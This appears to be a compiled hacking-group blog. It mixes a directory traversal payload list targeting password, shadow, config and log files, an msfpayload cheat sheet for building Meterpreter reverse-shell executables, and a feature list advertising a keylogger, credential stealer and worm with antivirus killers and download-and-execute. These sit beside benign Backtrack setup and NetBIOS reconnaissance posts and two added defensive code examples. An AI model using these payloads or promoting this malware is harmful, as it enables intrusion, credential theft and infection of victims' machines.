Directory Traversal Cheat Sheet


Cheat Sheet for Directory Traversal Attack







    ____ _                            _   _   _            _                 
   / ___| |__   ___ _ __  _ __   __ _(_) | | | | __ _  ___| | _____ _ __ ___ 
  | |   | '_ \ / _ \ '_ \| '_ \ / _` | | | |_| |/ _` |/ __| |/ / _ \ '__/ __|
  | |___| | | |  __/ | | | | | | (_| | | |  _  | (_| | (__|   <  __/ |  \__ \
   \____|_| |_|\___|_| |_|_| |_|\__,_|_| |_| |_|\__,_|\___|_|\_\___|_|  |___/




/etc/master.passwd
/master.passwd
etc/passwd
etc/shadow
/etc/passwd
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/shadow
———————————————————————————————————————————-
../../../../../../etc/passwd&=%3C%3C%3C%3C
../../../administrator/inbox
../../../../../../../dev
———————————————————————————————————————————-
.htpasswd
passwd
passwd.dat
pass.dat
.htpasswd
/.htpasswd
../.htpasswd
.passwd
/.passwd
../.passwd
.pass
../.pass
members/.htpasswd
member/.htpasswd
user/.htpasswd
users/.htpasswd
root/.htpasswd
———————————————————————————————————————————-
db.php
data.php
database.asp
database.js
database.php
dbase.php a
admin/access_log
../users.db.php
users.db.php
———————————————————————————————————————————-
/core/config.php
config.php
config.js
../config.js
config.asp
../config.asp
_config.php
../_config.php
../config.php
config.inc.php
../config.inc.php
/config.asp
../config.asp
/../../../../pswd
/admin/install.php
../install.php
install.php
———————————————————————————————————————————-
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow
..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd
..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow
..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
———————————————————————————————————————————-
/..\..\..\..\..\..\winnt\win.ini
../../windows/win.ini
..//..//..//..//..//boot.ini
..\../..\../boot.ini
..\../..\../..\../..\../boot.ini
\…..\\\…..\\\…..\\\
=3D “/..” . “%2f..
d:\AppServ\MySQL
c:\AppServ\MySQL
c:WINDOWS/system32/
/C:\Program Files\
/D:\Program Files\
/C:/inetpub/ftproot/
———————————————————————————————————————————-
/boot/grub/grub.conf
/proc/interrupts
/proc/cpuinfo
/proc/meminfo
———————————————————————————————————————————-
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_log
../../../../../../../usr/local/apache/logs/access.log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_log
../../../../../../../usr/local/apache/logs/error.log
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
———————————————————————————————————————————-
/etc/init.d/apache
/etc/init.d/apache2
/etc/httpd/httpd.conf
/etc/apache/apache.conf
/etc/apache/httpd.conf
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/opt/apache/conf/httpd.conf
/home/apache/httpd.conf
/home/apache/conf/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/default_vhost.include
———————————————————————————————————————————-
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
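
A server-side containment check that refuses the request shapes in the list above (plain ../ ladders, %2F and %5c encodings, the overlong %c0%ae form, absolute and drive-letter paths). This is an added example, not part of the original cheat sheet; the names `resolve_under` and `is_allowed` are hypothetical and a POSIX host is assumed.

```python
import os
import re
import tempfile
from urllib.parse import unquote_to_bytes


class PathRejected(ValueError):
    """Raised when a requested name must not be served."""


def resolve_under(base_dir: str, requested: str, max_rounds: int = 3) -> str:
    """Return the real path of `requested` inside `base_dir`, or raise PathRejected."""
    raw = requested.encode("utf-8")
    # Undo percent-encoding until the value stops changing, so ..%2F and
    # double-encoded forms are judged in the shape the filesystem will see.
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(raw)
        if decoded == raw:
            break
        raw = decoded
    else:
        raise PathRejected("too many layers of percent-encoding")
    try:
        # Strict UTF-8 refuses overlong sequences such as %c0%ae (an encoded ".").
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        raise PathRejected("invalid or overlong UTF-8") from None
    if "\x00" in text or "\\" in text:
        raise PathRejected("NUL byte or backslash separator")
    if text.startswith("/") or re.match(r"[A-Za-z]:", text):
        raise PathRejected("absolute path or drive letter")
    base = os.path.realpath(base_dir)
    # realpath collapses ../ and follows symlinks before the containment test.
    target = os.path.realpath(os.path.join(base, text))
    if os.path.commonpath([base, target]) != base:
        raise PathRejected("resolves outside the base directory")
    return target


def is_allowed(base_dir: str, requested: str) -> bool:
    try:
        resolve_under(base_dir, requested)
        return True
    except PathRejected:
        return False


if __name__ == "__main__":
    base = tempfile.mkdtemp()  # constructed stand-in for the served directory
    for name in ["img/logo.png", "../../etc/passwd", "..%2F..%2Fetc%2Fpasswd",
                 "..%5c..%5c/boot.ini", "/%c0%ae%c0%ae/etc/passwd", "/etc/passwd"]:
        print(f"{name!r:40} -> {'allow' if is_allowed(base, name) else 'reject'}")
```

Bare names from the list such as .htpasswd or config.php resolve inside the base directory and pass this check; keeping those files out of the served tree, or behind an allowlist of servable names, is a separate control.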


Backtrack kernel sources


Prepare Backtrack kernel sources






Some drivers and programs in Backtrack require kernel headers, for example wireless drivers and VMware Tools.
CHC members, this is the easy way of compiling the Backtrack kernel:


root@bt:~# prepare-kernel-sources
root@bt:~# cd /usr/src/linux
root@bt:/usr/src/linux# cp -rf include/generated/* include/linux/



NetBIOS Scanning


Scanning NetBIOS using nbtscan and Metasploit

Hello CHC members. During a penetration testing engagement we might come across the NetBIOS service. In the past, the NetBIOS protocol was enabled in almost every network that was running Windows. Nowadays system administrators are disabling this service because it can reveal plenty of information about shares, users and domain controllers. However, NetBIOS can still be found in default configurations of Windows Server 2008 and Windows Vista, so in a penetration test this protocol can be abused if we discover it.
Generally, NetBIOS provides the following three services:
  • Name Service: UDP/137
  • Datagram Service: UDP/138
  • Session Service: TCP/139
On systems that have this service enabled we can use some tools to discover information about hostnames and domains, especially in Windows networks. In some cases this protocol can also be found on Linux systems.
The two basic tools are nbtstat and nbtscan. nbtstat is a command-line utility that is integrated in Windows systems; it can reveal the NetBIOS names and the name table of the local machine or a remote one, but only for one host at a time. nbtscan, on the other hand, is a NetBIOS name server scanner that has the same functions as nbtstat but operates on a range of addresses instead of one.
The next image shows the usage of nbtstat:
[Image: nbtstat usage]
The numeric values are called suffixes. For example, the <01> and <1D> suffixes indicate the Master Browser, <20> that the machine is running the File Server service, <03> that a messenger service is running and <00> that a workstation service is running as well. <1E> is the Browser Service Elections.
nbtscan is installed by default on Backtrack, but there is a version for Windows platforms as well. We can use nbtscan to scan the whole network. As we can see from the next image, we have discovered the IP addresses, the NetBIOS names, the users that are logged in and the MAC addresses of the hosts that are running the NetBIOS service on the network.
[Image: nbtscan]

We can also use the -v option to produce verbose output.
[Image: nbtscan verbose output]

With the verbose option the output format is similar to that of nbtstat. Again, <01> indicates the Master Browser service, <00> the workstation, <20> the File Server service, and <1e> and <1d> the Browser Service Elections and the Master Browser. We can also see that the domain this workstation belongs to is London.
As an alternative, we can use the Metasploit module smb_version, which will reveal additional information such as the operating system name and version, the service pack level, the language, and the system and domain name.
[Image: Metasploit smb_version module]

Conclusion
As we saw in this article, from systems that had the NetBIOS service enabled we managed to discover plenty of information, including domain names, users, operating system versions, MAC addresses and more. If this service is found enabled, it can be used in the information gathering stage of a penetration test. So from a security point of view it is recommended that this service be disabled.
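
For auditing which hosts still disclose this information, the name table described above can be reduced to a short summary. This is an added example, not part of the original article: the sample table is constructed, the function name `summarize` is hypothetical, and the suffix meanings are the ones the article lists.

```python
import re

# Suffix meanings exactly as listed in the article above.
SUFFIX_MEANING = {
    "00": "Workstation service", "01": "Master Browser", "03": "Messenger service",
    "1D": "Master Browser", "1E": "Browser Service Elections", "20": "File Server service",
}

# One name-table row: NAME <suffix> UNIQUE|GROUP [status]
ROW = re.compile(r"^\s*(?P<name>\S.*?)\s*<(?P<suffix>[0-9A-Fa-f]{2})>\s+(?P<kind>UNIQUE|GROUP)\b")

# Constructed sample in the layout of an nbtstat name table; not a real host.
SAMPLE = """\
       Name               Type         Status
    ---------------------------------------------
    WKSTN-07       <00>  UNIQUE      Registered
    LONDON         <00>  GROUP       Registered
    WKSTN-07       <03>  UNIQUE      Registered
    WKSTN-07       <20>  UNIQUE      Registered
    LONDON         <1E>  GROUP       Registered
    LONDON         <1D>  UNIQUE      Registered
    ..__MSBROWSE__.<01>  GROUP       Registered
    WKSTN-07       <BE>  UNIQUE      Registered
"""


def summarize(name_table: str) -> dict:
    """Reduce a name table to what it discloses about the host."""
    out = {"host": None, "domain": None, "services": [], "unmapped": []}
    for line in name_table.splitlines():
        row = ROW.match(line)
        if row is None:
            continue  # header, separator or MAC address line
        suffix = row["suffix"].upper()
        # Standard NetBIOS convention (not spelled out in the article): a UNIQUE
        # <00> entry is the computer name, a GROUP <00> entry the domain/workgroup.
        if suffix == "00":
            out["host" if row["kind"] == "UNIQUE" else "domain"] = row["name"]
        meaning = SUFFIX_MEANING.get(suffix)
        if meaning is None:
            out["unmapped"].append(suffix)  # suffix the article does not cover
        elif meaning not in out["services"]:
            out["services"].append(meaning)
    # Flags for review: the article recommends disabling NetBIOS where found.
    out["exposes_file_server"] = "File Server service" in out["services"]
    out["is_master_browser"] = "Master Browser" in out["services"]
    return out


if __name__ == "__main__":
    for key, value in summarize(SAMPLE).items():
        print(f"{key}: {value}")
```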


Unknow Keylogger v1.4 (Tool+Source Code)


  
Unknow Keylogger v1.4









Features:

1- Built in Stub
2- Get Tons of Information about the Victim (Computer User, Computer Name, Computer Total Physical Memory, Victim's IP Address, Victim's Country, Date, etc...)
3- Send logs to SMTP Servers and FTP
4- SMTP (Hotmail, Gmail, AOL, Yahoo)
5- Test Mail Functionality (Hotmail, Gmail, AOL, Yahoo)
6- Test FTP Functionality
7- Continuously Send Logs without Fail
8- Custom Logs Sending Interval (Which means you Choose when the Logs are sent to you)
9- Logs Every Single Thing on the Keyboard (Letters (Upper Case and Lower Case) - Numbers - Symbols - Specific Keys ([F1], [F2], [Home], etc...))
10- Works on all Operating Systems (Windows XP, Windows Vista, Windows 7 (32 and 64 bit))
11- Hide Functionality (Make the Server Invisible to the Naked eye)
12- Never Crashes in Victim's Computer (Will always be working whatever happens)
13- Simple and Easy to use GUI
14- Customer Server Name
15- Sends Clean and Very Organized Logs
16- Can be Used as a Keylogger - Stealer - Worm - Spreader and more by just Checking Few Boxes


Spreaders:
1- USB Spreader 2- LAN Spreader 3- P2P Spreader 4- RAR Spreader


Stealers:
1- Firefox 4/5/6/7/8/9 2- Google Chrome All Versions 3- Opera All Versions 4- Internet Explorer 7/9 5- Steam Stealer 6- CD Keys (up to 300)


Anti Killers:
1- Anti Nod32 (All Versions) 2- Anti Kaspersky (All Versions) 3- Anti BitDefender (All Versions) 4- Anti MalwareBytes (All Versions) 5- Anti Norman (All Versions) 6- Anti WireShark (All Versions) 7- Anti Anubis (All Versions) 8- Anti KeyScrambler (All Versions) 9- Anti Ollydbg (All Versions) 10- Anti Outpost (All Versions) 11- Anti ZoneAlarm (All Versions)


Disablers:
1- Disable RUN 2- Disable Registry 3- Disable CMD 4- Disable Right Click 5- Disable Task Manager 6- Disable System Restore


Deleters:
1- Delete FireFox Cookies 2- Delete Google Chrome Cookies 3- Delete Internet Explorer Cookies


Download And Execute Add any Link that Leads to any kind of File and this File will be Downloaded and Execute Automatically and Anonymously 

Wpge Loader: Add any Link and it will be Automatically Loaded on the Victim's PC


Fake Message: Write any kind of Message and you can choose Any kinds of Types for it and it will Automatically Appear on the Victim's Computer


Built Ins 1- Icon Changer 2- File Pumper (the Server size will never change even if the Server was Zipped or Extracted)








Metasploit Framework Payload Commands

Msf Payload Commands

Here is a list with the available payload commands.


msfpayload -l
List available payloads.

msfpayload windows/meterpreter/bind_tcp O
List all available options for the windows/meterpreter/bind_tcp payload

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=443 X > payload.exe
Create a Meterpreter reverse_tcp payload that connects back to our IP on port 443, then save it as a Windows executable file with the name payload.exe.

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=443 R > payload.raw
Create a Meterpreter reverse_tcp payload that connects back to our IP and save it in raw format. It can be combined with msfencode.

msfpayload windows/meterpreter/bind_tcp LPORT=443 C > payload.c
Export as C-formatted shellcode

msfpayload windows/meterpreter/bind_tcp LPORT=443 J > payload.java
Export as %u encoded JavaScript.



The Hacker's underground Handbook

Underground hackers E-Book


To Become a Hacker
Most of them are very curious to learn Hacking and want to become a Hacker, but don’t know where to start. If you are in a similar situation, then this article will most likely guide you to reach your goal.

Anyhow, I have found an excellent Book for the Beginners that will teach you hacking from the basics. This book is the first step to fulfil your dream of becoming a hacker. When I first read this book, I myself was surprised at how simple and easy it was laid out. I decided to introduce this book for all those enthusiasts as it can be the right source for the beginners who are interested to learn hacking from the basics. The good thing about this book is that, any one can understand the concepts presented here, without the need for any prior knowledge. This book is called
Become a Hacker
This book will take you from the core to the top. It will tell you how to hack in simple steps. Everything in this book is presented in a simple and effective manner. It is a great source for the beginner who would like to become a hacker. This will install a Hacker’s Mindset on you.
The following skills are uncovered in this book
1. You will learn all the hacker underground tricks and learn to apply them in real world situations.
2. You will be put into a hacker mindset so that you will learn to think like a Hacker.
3. By learning how a hacker thinks and acts, you will be able to protect yourself from future hack attacks.
4. You will acquire knowledge nonexistent to 99.9% of the people in the world!
5. This underground handbook may get you interested in pursuing a career as an Ethical Hacker.
This book is of great value for all those who have a dream to become a Hacker.
So what are you waiting for? Go grab your copy now from the following link
                                    
 Download here


Adding an unprivileged user in backtrack

Add an user in Backtrack



Now that you have installed your Backtrack distribution and changed the default password from "toor" to one of your choice, another security measure is waiting for us.
The "root" account in Backtrack, as in any Linux distribution, is the most privileged account. It lets you do anything you like without asking for confirmation, simply because the system assumes that you are fully aware of every single step you take.
As a non-professional user of a Linux system, you may break things in the system and end up reinstalling it again and again. This is what makes so many Linux users give up and go back to their easy-to-use Windows systems; why go to all this trouble, they may say!
They simply don't know that one has to be a professional Linux user in order to run the system as the "root" user. So if you don't want to damage your system or lose important data, you have to create a non-privileged user in Backtrack. That way, even if you mishandle things in that account, the changes will not affect the "root" account in any way, even if your machine gets pwned by a hacker!


Instructions:
* root@bt:~# adduser kiko
Change "kiko" to the name of your choice.
Type the password for the user you created, then retype it.
You can fill in the rest of the fields or just skip them by pressing "enter", then type "y" to confirm.

* root@bt:~# visudo
Now that you have added your new user account, you would not want to switch to "root" for every small task! So we will allow the newly created user to use the "sudo" command. We need to add the user to the "sudoers" list, and this is what the "visudo" command is for.
Once you type it, the config file will be opened for you in "nano":






Go to the end of the screen and look for the following line: %admin ALL=(ALL) ALL




After this, add a line the same as the one above but replace "admin" with the username you created. The example in the video is:   %kiko ALL=(ALL) ALL
In sudoers a leading % marks a group name, so this line grants sudo to members of the group "kiko"; it covers the new user because adduser creates a group with the same name as the user.

Now you will be able to use the "sudo" command without having to switch back to the "root" account to do a specific task. If you want to install vlc, for example, you will have to type

kiko@bt:~$ sudo apt-get install vlc


Important! After you finish editing the file, hit "ctrl+O" to save the file, then hit "ctrl+X" to exit.
